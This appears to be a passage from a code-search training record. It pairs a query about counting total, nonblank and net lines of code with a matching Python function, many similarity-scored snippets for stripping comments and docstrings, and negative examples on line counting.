the same line, this is a one line comment.\n return [jline[jline.index(breaker)+3:jline.rindex(breaker)]]\n else:\n lines[i] = lines[i][lines[i].index(breaker)+3:]\n lines[i+j+1] = lines[i+j+1][:lines[i+j+1].rindex(breaker)]\n return lines[i:i+j+1]\n else:\n # end of the comment is not found.\n return\n else:\n # comment might start with #\n return extract_comment_sh(python_style=True)", "def unMarkupCommentsAndStrings(self, content):\n\n def replaceMarkups(match):\n groupdict = match.groupdict()\n if groupdict[\"str\"] is not None:\n return self.strings[int(match.group(\"str\"))]\n elif groupdict[\"comment\"] is not None:\n return self.comments[int(match.group(\"comment\"))]\n else:\n assert False\n\n unMarkedup = markups.sub(replaceMarkups, content)\n\n return unMarkedup", "def skip_comments(filepointer):\n\tcomments = []\n\tdata = '#'\n\ttry:\n\t\tpos = filepointer.tell()\n\texcept:\n\t\tprint(\"Could not read file.\")\n\t\treturn None\t\n\t\n\twhile data[0] == '#':\n\t\tdata = filepointer.readline()\n\t\tif not data:\n\t\t\traise Exception(\"Unexpected end of file while reading comments.\")\n\n\t\tif data[0] == '#':\n\t\t\tcomments.append(data)\n\t\t\tpos = filepointer.tell()\n\t\telse:\n\t\t\tfilepointer.seek(pos)\n\treturn comments", "def strip(self, src):\r\n # single-quoted character\r\n p = \"('.')\"\r\n \r\n # double-quoted string\r\n p += \"|(\\\"(?:[^\\\"\\\\\\\\]|\\\\\\\\.)*\\\")\"\r\n \r\n # single and multi-line comment\r\n p += \"|(//.*?$)|(/\\\\*[^*]*(?:\\\\*(?!/)[^*]*)*\\\\*/)\"\r\n \r\n # pre-processor directive\r\n p += \"|\" + \"(^\\\\s*#.*?$)\"\r\n\r\n regex = re.compile(p, re.MULTILINE)\r\n return regex.sub(' ', src)", "def extract_comment_sh(python_style=False):\n if not python_style:\n debug(\"extract comment from a shell script.\")\n lines = list(CURRENT_BUFFER)\n if lines[0].startswith(\"#!\"):\n lines = lines[1:]\n\n if python_style and re.search(r\"coding[:=]\\s*([-\\w.]+)\", lines[0]):\n # strip encoding line.\n lines = lines[1:]\n\n for i, line in enumerate(lines):\n if not line.startswith(\"#\"):\n break\n else:\n i += 1\n return [line.lstrip(\"# \") for line in lines[:i]]", "def _parse_comments(reader):\n regex = r'\\s*(#|\\/{2}).*$'\n regex_inline = r'(:?(?:\\s)*([A-Za-z\\d\\.{}]*)|((?<=\\\").*\\\"),?)(?:\\s)*(((#|(\\/{2})).*)|)$'\n\n pipe = []\n for line in reader:\n if re.search(regex, line):\n if re.search(r'^' + regex, line, re.IGNORECASE): continue\n elif re.search(regex_inline, line):\n pipe.append(re.sub(regex_inline, r'\\1', line))\n else:\n pipe.append(line)\n return \"\\n\".join(pipe)", "def dedent(comment):\n commentLines = comment.split('\\n')\n if len(commentLines) < 2:\n cleaned = list(map(str.lstrip, commentLines))\n else:\n spc = 0\n for char in commentLines[1]:\n if char in string.whitespace:\n spc = spc + 1\n else:\n break\n #now check other lines\n cleaned = []\n for line in commentLines:\n for i in range(min(len(line),spc)):\n if line[0] in string.whitespace:\n line = line[1:]\n cleaned.append(line)\n return '\\n'.join(cleaned)", "def hide_magic(source: str) -> str:\n\n def _hide_magic_line(line: str) -> str:\n return f\"###MAGIC###{line}\" if contains_magic(line) else line\n\n return \"\\n\".join(_hide_magic_line(line) for line in source.split(\"\\n\"))", "def _PreParse(line: str) -> str:\n line = line.rstrip(\"\\n\")\n\n commentIndex = line.find(\"/\")\n\n # no comment found\n if commentIndex == - 1:\n return line\n\n # truncate\n return line[0:commentIndex]", "def cleanup_code( content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def removeComment(line):\n ind = line.find('%')\n while True:\n if ind < 0:\n return line\n elif (ind > 0 and line[ind-1] != '\\\\') or ind == 0:\n break\n else:\n ind = line.find('%', ind+1)\n return line[:ind]", "def test_remove_single_line_comments_annotation():\n\n\tinput_ = \"\"\"line1\n\t\t\t\tline2 \n\t\t\t\t//comment\n\t\t\t\t//@Test //comment\n\t\t\t\t//comment\n\t\t\t\tline3 \"\"\"\n\n\texpect = \"\"\"line1\n\t\t\t\tline2 \n\t\t\t\t\n\t\t\t\t//@Test //comment\n\t\t\t\t\n\t\t\t\tline3 \"\"\"\n\n\tassert aunit.remove_single_line_comments(input_) == expect", "def listFromLines(lines):\n reComment = re.compile('#.*')\n temp = [reComment.sub('',x).strip() for x in lines.split('\\n')]\n temp = [x for x in temp if x]\n return temp", "def cleanup_code(content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n # remove `foo`\n return content.strip('` \\n')", "def clean_code(ls):\r\n ls = remove_white_space(ls)\r\n ls = remove_comments(ls)\r\n ls = remove_empty_lines(ls)\r\n\r\n return ls", "def strip_comment_line_with_symbol(line, start): # pragma: no cover\n parts = line.split(start)\n counts = [len(re.findall(r'(?:^|[^\"\\\\]|(?:\\\\\\\\|\\\\\")+)(\")', part))\n for part in parts]\n total = 0\n for nr, count in enumerate(counts):\n total += count\n if total % 2 == 0:\n return start.join(parts[:nr + 1]).rstrip()\n else: # pragma: no cover\n return line.rstrip()", "def clean_docstring(doc: str, unused: Literal[\"pre\", \"post\"] = None) -> str:\n doc = doc.split(\"\\n\")\n if unused == \"pre\":\n try:\n index = next(i for i, l in enumerate(doc) if l.strip())\n doc = doc[index:]\n except StopIteration:\n doc = []\n elif unused == \"post\":\n try:\n index = next(i for i, l in enumerate(reversed(doc)) if l.strip())\n doc = doc[: len(doc) - index]\n except StopIteration:\n doc = []\n if doc:\n first_line = doc[0]\n index = len(first_line) - len(first_line.lstrip())\n indent = first_line[:index]\n if all(l.startswith(indent) for l in doc if l.strip()):\n doc = [(l[index:] if l.strip() else l) for l in doc]\n return \"\\n\".join(doc)", "def getcomments(object):\r\n try:\r\n lines, lnum = findsource(object)\r\n except (IOError, TypeError):\r\n return None\r\n\r\n if ismodule(object):\r\n # Look for a comment block at the top of the file.\r\n start = 0\r\n if lines and lines[0][:2] == '#!': start = 1\r\n while start < len(lines) and string.strip(lines[start]) in ('', '#'):\r\n start = start + 1\r\n if start < len(lines) and lines[start][:1] == '#':\r\n comments = []\r\n end = start\r\n while end < len(lines) and lines[end][:1] == '#':\r\n comments.append(string.expandtabs(lines[end]))\r\n end = end + 1\r\n return string.join(comments, '')\r\n\r\n # Look for a preceding block of comments at the same indentation.\r\n elif lnum > 0:\r\n indent = indentsize(lines[lnum])\r\n end = lnum - 1\r\n if end >= 0 and string.lstrip(lines[end])[:1] == '#' and \\\r\n indentsize(lines[end]) == indent:\r\n comments = [string.lstrip(string.expandtabs(lines[end]))]\r\n if end > 0:\r\n end = end - 1\r\n comment = string.lstrip(string.expandtabs(lines[end]))\r\n while comment[:1] == '#' and indentsize(lines[end]) == indent:\r\n comments[:0] = [comment]\r\n end = end - 1\r\n if end < 0: break\r\n comment = string.lstrip(string.expandtabs(lines[end]))\r\n while comments and string.strip(comments[0]) == '#':\r\n comments[:1] = []\r\n while comments and string.strip(comments[-1]) == '#':\r\n comments[-1:] = []\r\n return string.join(comments, '')", "def stripText(self, rawText):\n strippedText = []\n for line in rawText:\n if line.rstrip():\n if line[0] != '#':\n strippedText.append(line.rstrip()) #also remove newline character\n return strippedText", "def _RemoveStaleComments(content: str) -> str:\n for match in STALE_GROUP_COMMENT_REGEX.findall(content):\n content = content.replace(match, '')\n\n return content", "def cleanup_code(content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def toggle_comment(self):\n r = vim.current.range\n rlen = r.end - r.start + 1\n ac = self.all_comment(r, 0, rlen)\n for i in range(0, rlen):\n r[i] = r[i].replace(self._cstr, '')\n if not ac:\n for i in range(0, rlen):\n r[i] = re.sub(r'^(\\s*)', r'\\1{0}'.format(self._cstr), r[i])", "def cleanup_code(self, content):\n\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n if content[-4] == '\\n':\n return '\\n'.join(content.split('\\n')[1:-1])\n return '\\n'.join(content.split('\\n')[1:]).rstrip('`')\n\n # remove `foo`\n return content.strip('` \\n')", "def minimize_source(source):\n if not isinstance(source, mitogen.core.UnicodeType):\n source = source.decode('utf-8')\n tokens = tokenize.generate_tokens(StringIO(source).readline)\n tokens = strip_comments(tokens)\n tokens = strip_docstrings(tokens)\n tokens = reindent(tokens)\n return tokenize.untokenize(tokens)", "def _parse_comment(i, doc):\n\n if doc[i].strip() != \"/**\":\n raise ParseFailure(i, \"Expected beginning of block comment\")\n\n e = i + 1\n while e < len(doc) and doc[e].strip() != \"*/\":\n e += 1\n\n return e + 1, [x.rstrip() for x in doc[i + 1: e]]", "def strip_comment_line_with_symbol(line, start):\n parts = line.split(start)\n counts = [len(re.findall(r'(?:^|[^\"\\\\]|(?:\\\\\\\\|\\\\\")+)(\")', part))\n for part in parts]\n total = 0\n for nr, count in enumerate(counts):\n total += count\n if total % 2 == 0:\n return start.join(parts[:nr + 1]).rstrip()\n else: # pragma: no cover\n return line.rstrip()", "def clean_comment(pair):\n pair = [remove_newlines(i) for i in pair]\n pair = [i.strip() for i in pair]\n # Remove colons\n pair[0] = pair[0].replace(':', '')\n # Remove excess whitespace\n whitespace_regex = re.compile('\\s\\s+')\n pair[1] = whitespace_regex.sub(' ', pair[1])\n return pair", "def skipComment(self):\r\n\t\tch = self.nextChar()\r\n\t\twhile ch and ch != \"\\n\":\r\n\t\t\tch = self.nextChar()", "def cleanup_code(self, content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def comment_cleaner(text):\n text = re.sub(\"[^\\w\\s]\", \"\", text)\n text = \" \".join([x.lower() for x in text.split(' ') if x.lower() in corpus and x.lower() not in stopwords and len(x) > 1])\n if text == '':\n return np.nan\n return text", "def parse_comment(comment: Union[Token, PsuedoToken]) -> str:\n # Happens when there is no documentation comment in the source file for the\n # item.\n spelling = comment.spelling\n if spelling is None:\n return \"\"\n\n # Comments from clang start at the '/*' portion, but if the comment itself\n # is indented subsequent lines will have too much indent.\n # Transform::\n #\n # \"/**\\n * hello some comment\\n * on multiple lines\\n */\"\n #\n # into::\n #\n # \"/**\\n * hello some comment\\n * on multiple lines\\n */\"\n indent = \" \" * (comment.extent.start.column - 1)\n indented_comment = indent + spelling\n dedented_comment = textwrap.dedent(indented_comment)\n\n # Notes on the regex here.\n # Option 1 '\\s?\\*/?'\n # This piece will match comment lines that start with '*' or ' *'.\n # This will also match a trailing '*/' for the end of a comment\n #\n # Option 2 '^/\\*+<?'\n # This will match the start of a comment '/*' and consume any\n # subsequent '*'. This is also meant to catch '/**<' for trailing comments.\n #\n # Option 3 '\\*+/'\n # Matches any and all '*' up to the end of the comment string.\n contents = re.sub(\n r\"^\\s?\\*/?|^/\\*+<?|\\*+/\",\n lambda x: len(x.group(0)) * \" \",\n dedented_comment,\n flags=re.MULTILINE,\n )\n\n contents = textwrap.dedent(contents)\n\n # there may still be left over newlines so only strip those, but leave any\n # whitespaces.\n contents = contents.strip(\"\\n\")\n\n return contents", "def print_comments():\n with open('a_cpp_file.cpp', 'r') as file:\n data = file.read()\n to_print = ''\n should_print = False\n for i, char in enumerate(data):\n if i > 1:\n if data[i-1] == '*' and data[i-2] == '/':\n should_print = True\n if char == '*' and data[i+1] == '/' and should_print:\n should_print = False\n print(to_print)\n to_print = ''\n if should_print:\n to_print += char\n should_print = False\n for i, char in enumerate(data):\n if i > 1:\n if data[i-1] == '/' and data[i-2] == '/':\n should_print = True\n if char == '\\n' and should_print:\n should_print = False\n print(to_print)\n to_print = ''\n if should_print:\n to_print += char", "def stripped_lines(lines, ignore_comments, ignore_docstrings, ignore_imports):\n if ignore_imports:\n tree = astroid.parse(\"\".join(lines))\n node_is_import_by_lineno = (\n (node.lineno, isinstance(node, (astroid.Import, astroid.ImportFrom)))\n for node in tree.body\n )\n line_begins_import = {\n lineno: all(is_import for _, is_import in node_is_import_group)\n for lineno, node_is_import_group in groupby(\n node_is_import_by_lineno, key=lambda x: x[0]\n )\n }\n current_line_is_import = False\n\n strippedlines = []\n docstring = None\n for lineno, line in enumerate(lines, start=1):\n line = line.strip()\n if ignore_docstrings:\n if not docstring and any(\n line.startswith(i) for i in ['\"\"\"', \"'''\", 'r\"\"\"', \"r'''\"]\n ):\n docstring = line[:3]\n line = line[3:]\n if docstring:\n if line.endswith(docstring):\n docstring = None\n line = \"\"\n if ignore_imports:\n current_line_is_import = line_begins_import.get(\n lineno, current_line_is_import\n )\n if current_line_is_import:\n line = \"\"\n if ignore_comments:\n line = line.split(\"#\", 1)[0].strip()\n strippedlines.append(line)\n return strippedlines", "def test_dislike_a_comment(self):\n self.base_test()", "def process_comment(self, data):\r\n if not self.is_suppress:\r\n return [data]", "def make_comment(self, input, start, end, elements):\n return elements[1].text.strip('{}')", "def trim_comment(line):\n if ';' not in line:\n return (line, None)\n\n comment_start = line.index(';')\n before_comment = line[:comment_start]\n spaces_before_comment = len(before_comment) - len(before_comment.rstrip())\n comment = line[comment_start:]\n return (before_comment.rstrip(), spaces_before_comment * ' ' + comment)", "def sanitize_comment(comment):\n\n if hasattr(settings, \"BLEACH_ALLOWED_TAGS\"):\n allowed_tags = settings.BLEACH_ALLOWED_TAGS\n else:\n allowed_tags = bleach.sanitizer.ALLOWED_TAGS\n\n return bleach.clean(comment, tags=allowed_tags, strip=True)", "def remove_curl_debug_lines(text: str) -> str:\n lines = text.split(\"\\n\")\n lines = [line for line in lines if not line.startswith(\"**\")]\n return \"\\n\".join(lines)", "def clean(text):\n lines = text.split('\\n')\n\n indx = range(len(lines))\n indx.reverse()\n for i in indx:\n temp = lines[i].strip()\n if temp == '' or temp.startswith('#'):\n del lines[i]\n else:\n lines[i] = temp\n\n return lines", "def clean_tinymce(input):\n result = input\n result = result.replace(u'<#document-fragment>', u'') # A strange bug that the NIVE client experiences but that we can't reproduce.\n result = result.replace(u'&lt;#document-fragment&gt;', u'') # A strange bug that the NIVE client experiences but that we can't reproduce.\n result = html_comments.sub(u'', result)\n return result", "def block_comments(code):\n block = list()\n for line in code:\n if bool(line.strip()): # If line is not empty\n if line.strip()[0] == '!': # If the first character of the string is the start of a comment it adds it\n block.append(identify_comment(line))\n elif bool(line.strip()): # If the first character of the string is not the start of a comment or its not empty it exits\n break\n return block", "def getHTMLComments(self, text):\n return self.doSpecial(text, '<!--', '-->', self.fParseHTMLComments)", "def remove_comments(ctx, files):\n # CD into Salt's repo root directory\n ctx.cd(CODE_DIR)\n\n # Unfortunately invoke does not support nargs.\n # We migth have been passed --files=\"foo.py bar.py\"\n # Turn that into a list of paths\n _files = []\n for path in files:\n if not path:\n continue\n _files.extend(path.split())\n if not _files:\n utils.exit_invoke(0)\n\n _files = [\n pathlib.Path(fname).resolve() for fname in _files if fname.endswith(\".py\")\n ]\n\n fixes = 0\n exitcode = 0\n comments_regex = re.compile(r\"^# ([I|i])mports? .*(([L|l])ibs?)?\\n\", re.MULTILINE)\n for path in _files:\n contents = path.read_text()\n fixed = comments_regex.sub(\"\", contents)\n if fixed == contents:\n continue\n fixes += 1\n exitcode = 1\n path.write_text(fixed)\n if exitcode:\n utils.error(\"Fixed {} files\", fixes)\n utils.exit_invoke(exitcode)", "def docstring_hack():\n pass", "def _preprocess(self, source):\n source = source.replace(u'\\n', u'').strip()\n source = re.sub(r'<br\\s*\\/?\\s*>', u' ', source, re.I)\n source = re.sub(r'\\s\\s+', u' ', source)\n return source", "def lines(filename, exclude_imports=True, exclude_comments=True, exclude_tests=True, exclude_globals=True, exclude_blank=True, verbose=False, is_c=False, s=None):\n if s is None:\n s = open(filename, 'rt').read()\n\n L = s.split('\\n')\n \n # Hack to strip out triple and single quote string lines in a heuristic (unreliable) way, which avoids parsing Cython\n if not is_c:\n for i in range(len(L)):\n if L[i].strip().startswith(\"'\") and L[i].strip().endswith(\"'\"):\n L[i] = ''\n i = 0\n while i < len(L):\n found = False\n for triple_quote in ['\"\"\"', \"'''\"]:\n if L[i].strip().startswith(triple_quote):\n L[i] = L[i].strip()[3:]\n for j in range(i, len(L)):\n if triple_quote in L[j]:\n found = True\n L[j] = ''\n if found:\n break\n i = j+1\n if not found:\n i += 1\n else:\n begin_comment = '/*'\n end_comment = '*/'\n i = 0\n while i < len(L):\n found = False\n if begin_comment in L[i]:\n rest = L[i][L[i].index(begin_comment)+len(begin_comment):]\n L[i] = L[i][:L[i].index(begin_comment)]\n if end_comment in rest:\n found = True\n i += 1\n else:\n for j in range(i+1, len(L)):\n if end_comment in L[j]:\n found = True\n L[j] = L[j][L[j].index(end_comment)+len(end_comment):]\n else:\n L[j] = ''\n if found:\n break\n i = j + 1\n if not found:\n i += 1\n\n# util.print_header('Lines before exclude_tests:' + filename, '\\n'.join(L))\n\n # Hack to strip out def test() and other methods in a heuristic (unreliable) way, which avoids parsing Cython\n if exclude_tests:\n # Also exclude makeColorMatrix so that our camera pipe is apples-to-apples comparable with reported lines in Halide paper\n if not is_c:\n methods = 'test run_test_all mandelbrot_gray mandelbrot_color composite_numpy composite_numexpr makeColorMatrix'.split()\n else:\n methods = ['int main', 'void main']\n i = 0\n while i < len(L):\n L_i_strip = L[i].strip()\n if ((not is_c and (any(L_i_strip.startswith('def ' + method) for method in methods) or\n any(L_i_strip.startswith('cdef ' + method) for method in methods))) or\n (is_c and (any(L_i_strip.startswith(method) for method in methods)))):\n L[i] = ''\n for j in range(i+1, len(L)):\n L_j_strip = L[j].strip()\n c_ok = True\n if is_c:\n c_ok = L_j_strip != '{' and L_j_strip != '}'\n if not L[j].startswith(' ') and not L[j].startswith('\\t') and not len(L[j].strip()) == 0 and c_ok:\n break\n else:\n L[j] = ''\n i = j\n elif (L[i].strip().startswith('test(') or L[i].strip().startswith('run_test_all(')) and not is_c:\n L[i] = ''\n i += 1\n else:\n i += 1\n\n# util.print_header('Lines before exclude_imports:' + filename, '\\n'.join(L))\n if exclude_imports:\n if not is_c:\n L = [x for x in L if not x.lstrip().startswith('import') and not x.lstrip().startswith('cimport') and not x.startswith('cdef extern')]\n else:\n L = [x for x in L if not x.lstrip().startswith('#include')]\n# util.print_header('Lines before exclude_comments:' + filename, '\\n'.join(L))\n if exclude_comments:\n if not is_c:\n L = [x for x in L if not x.lstrip().startswith('#') and not x.strip() == 'pass']\n else:\n L = [x for x in L if not x.lstrip().startswith('//')]\n# util.print_header('Lines before exclude_globals:' + filename, '\\n'.join(L))\n if exclude_globals and not is_c:\n L = [x for x in L if (x.startswith(' ') or x.startswith('\\t') or x.startswith('def') or x.startswith('cdef')) and (not x.lstrip().startswith('has_'))]\n# util.print_header('Lines before exclude_blank:' + filename, '\\n'.join(L))\n\n if is_c:\n # Also exclude makeColorMatrix so that C camera pipe is apples-to-apples comparable with reported lines in Halide paper\n L = [x for x in L if not x.lstrip().startswith('matrix_3200') and not x.lstrip().startswith('matrix_7000')]\n if exclude_blank:\n L = [x for x in L if not len(x.strip()) == 0]\n\n if verbose:\n util.print_header('Final lines for:' + filename, '\\n'.join(L))\n\n return len(L)", "def parse_code_comment(self, filepath):\n raise NotImplementedError('Not Implemented')", "def _clean_message(comment):\n message = comment['message']\n # Remove comments with linked persons (they mostly contain only emojis)\n if 'message_tags' in comment:\n for tag in comment['message_tags']:\n if 'type' in tag and tag['type'] == 'user':\n message = message.replace(tag['name'], '')\n # Remove links\n message = re.sub(r'http\\S+', '', message)\n return message.strip()", "def test_comments(self):\n fp = FilePath(self.mktemp())\n fp.setContent('something\\n#commented\\ncool')\n self.assertEqual(list(inventoryReader(fp.path)), ['something', 'cool'])", "def implement(self):\n\t#@DEBUG remove comments", "def skip(self):\n input = self.source\n startLine = self.line\n\n # Whether this is the first called as happen on start parsing a file (eat leading comments/white space)\n startOfFile = self.cursor is 0\n \n indent = \"\"\n \n while (True):\n if len(input) > self.cursor:\n ch = input[self.cursor]\n else:\n return\n \n self.cursor += 1\n \n if len(input) > self.cursor:\n next = input[self.cursor]\n else:\n next = None\n\n if ch == \"\\n\" and not self.scanNewlines:\n self.line += 1\n indent = \"\"\n \n elif ch == \"/\" and next == \"*\":\n self.cursor += 1\n text = \"/*\"\n inline = startLine == self.line and startLine > 1\n commentStartLine = self.line\n if startLine == self.line and not startOfFile:\n mode = \"inline\"\n elif (self.line-1) > startLine:\n # distance before this comment means it is a comment block for a whole section (multiple lines of code)\n mode = \"section\"\n else:\n # comment for maybe multiple following lines of code, but not that important (no visual white space divider)\n mode = \"block\"\n \n while (True):\n try:\n ch = input[self.cursor]\n self.cursor += 1\n except IndexError:\n raise ParseError(\"Unterminated comment\", self.fileId, self.line)\n \n if ch == \"*\":\n next = input[self.cursor]\n if next == \"/\":\n text += \"*/\"\n self.cursor += 1\n break\n \n elif ch == \"\\n\":\n self.line += 1\n \n text += ch\n \n \n # Filter escaping on slash-star combinations in comment text\n text = text.replace(\"*\\/\", \"*/\")\n \n try:\n self.comments.append(Comment.Comment(text, mode, commentStartLine, indent, self.fileId))\n except Comment.CommentException as commentError:\n Console.error(\"Ignoring comment in %s: %s\", self.fileId, commentError)\n \n \n elif ch == \"/\" and next == \"/\":\n self.cursor += 1\n text = \"//\"\n if startLine == self.line and not startOfFile:\n mode = \"inline\"\n elif (self.line-1) > startLine:\n # distance before this comment means it is a comment block for a whole section (multiple lines of code)\n mode = \"section\"\n else:\n # comment for maybe multiple following lines of code, but not that important (no visual white space divider)\n mode = \"block\"\n \n while (True):\n try:\n ch = input[self.cursor]\n self.cursor += 1\n except IndexError:\n # end of file etc.\n break\n\n if ch == \"\\n\":\n self.line += 1\n break\n \n text += ch\n \n try:\n self.comments.append(Comment.Comment(text, mode, self.line-1, \"\", self.fileId))\n except Comment.CommentException:\n Console.error(\"Ignoring comment in %s: %s\", self.fileId, commentError)\n\n # check for whitespace, also for special cases like 0xA0\n elif ch in \"\\xA0 \\t\":\n indent += ch\n\n else:\n self.cursor -= 1\n return", "def extract_docstring(loaded):\n\n source = loaded['cells'][0]['source']\n\n assert source[0].strip() == '\"\"\"'\n assert source[-1].strip() == '\"\"\"'\n\n return ' '.join(i.strip() for i in source[1:-1])" ]
[ "0.75588655", "0.75129175", "0.749204", "0.73860633", "0.73546356", "0.7324829", "0.72374445", "0.71416444", "0.711339", "0.6960461", "0.6960461", "0.6952356", "0.6892819", "0.68833077", "0.6868674", "0.6861091", "0.6856785", "0.676051", "0.67446506", "0.6728799", "0.6727674", "0.6724714", "0.6707175", "0.66807467", "0.667315", "0.6668189", "0.66435033", "0.66254854", "0.66162", "0.66085774", "0.65951186", "0.65736073", "0.6537083", "0.6528689", "0.6515998", "0.64742666", "0.64642775", "0.6441234", "0.64359754", "0.64288074", "0.64198416", "0.641012", "0.6405897", "0.63365793", "0.63111144", "0.6298483", "0.6292943", "0.6274877", "0.6268455", "0.6268124", "0.6256677", "0.6255419", "0.6241036", "0.62279487", "0.62170583", "0.6208556", "0.6169485", "0.6161645", "0.6148886", "0.61455697", "0.6142864", "0.61210024", "0.61108273", "0.60958654", "0.60682625", "0.6030614", "0.602931", "0.60185385", "0.6000323", "0.59986377", "0.5991848", "0.59819514", "0.5981819", "0.59790814", "0.5970963", "0.5939837", "0.5939558", "0.5939266", "0.593707", "0.59115154", "0.5883732", "0.58800626", "0.5875241", "0.58733565", "0.586912", "0.58522767", "0.5840889", "0.5834861", "0.58315915", "0.58189857", "0.5814354", "0.58114666", "0.578702", "0.5765274", "0.5763269", "0.5757027", "0.5742677", "0.57408607", "0.57307595", "0.5723984" ]
0.6970854
9
Returns the total line count, nonblank line count, and net line count excluding comments and docstrings
def loc(blob, delim='#'): total = get_line_count(blob) blob = strip_blanklines(blob) nonblank = get_line_count(blob) blob = strip_docstring(blob) blob = strip_comments(blob, delim) net = get_line_count(blob) num_inputs = len([m.start() for m in re.finditer('input ?\(', blob)]) return { 'total': total, 'nonblank': nonblank, 'net': net, 'num_inputs': num_inputs}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 11)", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 4)", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 4)", "def test_line_count(self):\n\t\tself.assertEqual(analyse_text(self.filename)[0], 4)", "def get_total_line_counts(self):\n return get_total_line_counts(self.files.all())", "def get_linecount(self):\n self._update_linetab(len(self.input))\n lcount = len(self.__linepos)\n return lcount - (self.input.endswith('\\n'))", "def calculate_line_number(text):\n return len([line for line in text.split(\"\\n\") if line.strip() != \"\"])", "def linecount(x):\n return sum(1 for char in x if char == \"\\n\")", "def __len__(self):\n nlines = self.get_endline() - self.get_startline() + 1\n if nlines < 0:\n nlines = 0\n return nlines", "def _getOldCodeLength(self):\n nb_lines = 0\n for line in self.body.splitlines():\n if not line.startswith(\"+\"):\n nb_lines += 1\n return nb_lines", "def n_lines(self):\n try: \n return self._n_lines\n except AttributeError:\n self._n_lines = len(self.lines())\n return self._n_lines", "def linecounter(x):\n return linecount(x) + longlines(x)", "def _getNewCodeLength(self):\n nb_lines = 0\n for line in self.body.splitlines():\n if not line.startswith(\"-\"):\n nb_lines += 1\n return nb_lines", "def test_line_counts(self):\n diff = (\n b'+ This is some line before the change\\n'\n b'- And another line\\n'\n b'Index: foo\\n'\n b'- One last.\\n'\n b'--- README 123\\n'\n b'+++ README (new)\\n'\n b'@@ -1,1 +1,1 @@\\n'\n b'-blah blah\\n'\n b'-blah\\n'\n b'+blah!\\n'\n b'-blah...\\n'\n b'+blah?\\n'\n b'-blah!\\n'\n b'+blah?!\\n')\n files = DiffParser(diff).parse()\n\n self.assertEqual(len(files), 1)\n self.assertEqual(files[0].insert_count, 3)\n self.assertEqual(files[0].delete_count, 4)", "def no_of_lines():\n number_of_lines = len(open(FILE_NAME).readlines())\n return number_of_lines", "def num_lines(self, snapshot: Bug, filepath: str) -> int:\n return len(self._line_offsets(snapshot, filepath))", "def _count_comment_rows(vcf_path):\n vcf_lines_generator = lines_from_vcf(vcf_path)\n\n comment_lines_count = 0\n for line in vcf_lines_generator:\n if line.startswith('#'):\n comment_lines_count += 1\n else:\n vcf_lines_generator.close() # Don't leave the file handle opened\n # Don't continue reading the VCF once the comments section ended\n break\n\n return comment_lines_count", "def sentence_count(self):\n count = 0\n for line in self.lines:\n if '.' in line:\n count += 1\n if count == 0:\n count = 1\n return count\n #return line.count('.')\n #else:\n #return 1", "def get_line_count(blob):\n return len(blob.split('\\n'))", "def analyzeCppCode(self, sourceFile):\n numLines = 0 # Number of lines of code\n numComments = 0 # Number of comments in the code\n\n f=self.openFile(sourceFile)\n for line in f:\n numLines += 1;\n loc = 0\n while (loc != -1): #count the # of times the '/*' characters appears\n loc = line.find(\"#\", loc)\n if (loc != -1):\n loc += 1\n numComments += 1\n \n loc = 0\n loc = line.find('//', loc) #count the # of times the '//' characters appears\n if (loc != -1):\n loc += 1\n numComments += 1\n \n f.close()\n return numLines, numComments", "def line_count(fname):\n return int(call(['wc', '-l', fname]).strip().split()[0])", "def line_count(file):\n with open(file, \"r\") as f:\n return sum(1 for line in f)", "def number_of_lines(filename=\"\"):\n num_lines = 0\n with open(filename, encoding=\"utf-8\") as myFile:\n return myFile.read().count('\\n')", "def CountLineNumber(filename):\n\n fp = open(os.path.abspath(filename), \"r\");\n lines = 0\n for line in fp.readlines():\n lines = lines + 1\n fp.close()\n return lines", "def lineNumber(self):\n if self.__lineNumber is None:\n self.__lineNumber = self.__source.count(\"\\n\", 0, self.__offset) + 1\n\n return self.__lineNumber", "def no_of_lines():\n return render_template(\"no_of_lines.html\", no_of_lines=no_of_lines())", "def count_lines(file_uri):\n\n with open(file_uri) as file_obj:\n for i, line in enumerate(file_obj):\n pass\n num_lines = i + 1\n return num_lines", "def get_number_lines(running_reward_file, running_loss_file, action_count_file):\n if Path(running_reward_file).exists():\n data = np.loadtxt(running_reward_file).reshape(-1,2)\n return data.shape[0]\n if Path(running_loss_file).exists():\n data = np.loadtxt(running_loss_file).reshape(-1,2)\n return data.shape[0]\n if Path(action_count_file).exists():\n data = np.loadtxt(action_count_file).reshape(-1,2)\n return data.shape[0]\n raise NameError(\"No files to count lines\")", "def countLines(file_name, start, end):\r\n\r\n with open(file_name, \"r\") as file:\r\n counter_lines = 0\r\n\r\n for line in islice(file, start, end):\r\n counter_lines += 1\r\n\r\n return counter_lines", "def len(self):\n\t\t\n\t\treturn len(self.line)", "def lines_processed(self) -> int:\n with self.lock:\n return self._lines_processed", "def word_count(self):\n print(self.words())\n return len(self.words())\n #count = 0\n #for lines in self.lines:\n # line = lines.strip(os.linesep)\n # wordslst = line.split()\n # count += len(wordslst)\n #return count\n #joined_string = ''.join(self.lines)\n #for word in joined_string:\n # if word != ' ' and word != '\\n' and word != '\\t':\n # count += 1\n #print('READ ME ––––––––––', self.lines)\n #print(joined_string)\n #print(line)\n #print(wordslst)\n #print(count)", "def fileLineCount(fPath):\n\twith open(fPath) as f:\n\t\tfor i, li in enumerate(f):\n\t\t\tpass\n\treturn (i + 1)", "def _loc(self) -> int:\n return len(self.lines)", "def header_len(self):\n if self.num_lines_header is None:\n Nheader = 0\n with self._compression_safe_file_opener(self.input_fname, \"r\") as f:\n for i, l in enumerate(f):\n if (l[0 : len(self.header_char)] == self.header_char) or (\n l == \"\\n\"\n ):\n Nheader += 1\n else:\n break\n\n return Nheader\n else:\n return self.num_lines_header", "def comments(self):\n lineno = 0\n novermin = set()\n src = self.__source\n if type(src) == bytes:\n src = 